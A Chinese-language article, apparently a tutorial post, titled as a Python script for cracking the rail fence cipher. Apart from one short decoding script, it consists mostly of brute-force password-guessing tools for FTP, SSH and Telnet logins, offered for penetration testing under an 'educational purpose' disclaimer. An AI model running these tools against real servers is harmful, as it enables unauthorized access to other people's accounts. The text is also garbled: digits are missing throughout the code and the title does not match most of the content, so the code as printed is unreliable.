Python脚本暴力破解栅栏密码
投稿:mrr
在渗透测试当中,免不了要进行密码破解。本文通过好几种方法给大家介绍python密码破解,有通用脚本,FTP暴力破解脚本,SSH暴力破解,TELNET密码暴力破解,感兴趣的朋友一起学习吧
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range(b)} for i in range(elen): a = i % b; result.update({a:result[a] + e[i]}) d = ‘‘ for i in range(b): d = d + result[i] print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d
方法二:
FTP暴力破解脚本
#!/usr/bin/env python #-*-coding = utf--*- #author:@xfk #blog:@blog.sina.com.cn/kaiyongdeng #date:@-- import sys, os, time from ftplib import FTP docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ftp_bf.py [*] Coder : [*] Version : . [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ftp_bf.py v.. |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.strftime("%X") print docs+END def help(): print R+"[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit() def bf_login(hostname,username,password): # sys.stdout.write("\r[!]Checking : %s " % (p)) # sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y+"\n[!] wt,wt!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",username, "" print "[+] Password : ",password, ""+END return # sys.exit() except Exception, e: pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END sys.exit() def anon_login(hostname): try: print G+"\n[!] Checking for anonymous login.\n"+END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END ftp.quit() except Exception, e: print R+"\n[-] Anonymous login failed...\n"+END pass def main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"[!] BruteForcing target ..."+END anon_login(hostname) # print "here is ok" # print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count = while count < len(user): user[count] = user[count].strip() count += except: print R+"\n[-] Cheak your usernamelist path\n"+END sys.exit() # print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count = while count < len(pwd): pwd[count] = pwd[count].strip() count += except: print R+"\n[-] Check your passwordlist path\n"+END sys.exit() print G+"\n[+] Loaded:",len(user),"usernames" print "\n[+] Loaded:",len(pwd),"passwords" print "[+] Target:",hostname print "[+] Guessing...\n"+END for u in user: for p in pwd: result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) if result != : print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result : print R+"\n[-]There is no username ans password enabled in the list." print "[-]Exiting...\n"+END if __name__ == "__main__": main()
SSH暴力破解
#!/usr/bin/env python #-*-coding = UTF--*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threading import Thread try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print G+''' You need paramiko module. http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END sys.exit() docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfk [*] Version : v.. [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ssh_bf.py v.. |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs+END def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is )" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit() def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status def makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R+'unable to read file \'%s\'' % file+END pass except Exception, e: print R+'unknown error'+END pass for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return items def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[:].index(arg))+]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"\n[!] BruteForcing target ...\n"+END # print "here is ok" # print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(hostname, port, username, password) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END # pass else: print G+"\n[+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s\n" % password+END # sys.exit() except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise print Y+"[+] Done.^-^\n"+END sys.exit() if __name__ == "__main__": main()
TELNET密码暴力破解
#!usr/bin/python #Telnet Brute Forcer #http://www.darkcde.com #dhydr[at]gmail[dot]com import threading, time, random, sys, telnetlib from copy import copy if len(sys.argv) !=: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit() try: users = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit() try: words = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit() print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v." print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words),"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"* print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until("login: ") tn.write(user + "\n") if password: tn.read_until("Password: ") tn.write(value + "\n") tn.write("ls\n") tn.write("exit\n") print tn.read_all() print "\t\nLogin successful:",value, user tn.close() work.join() sys.exit() except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep()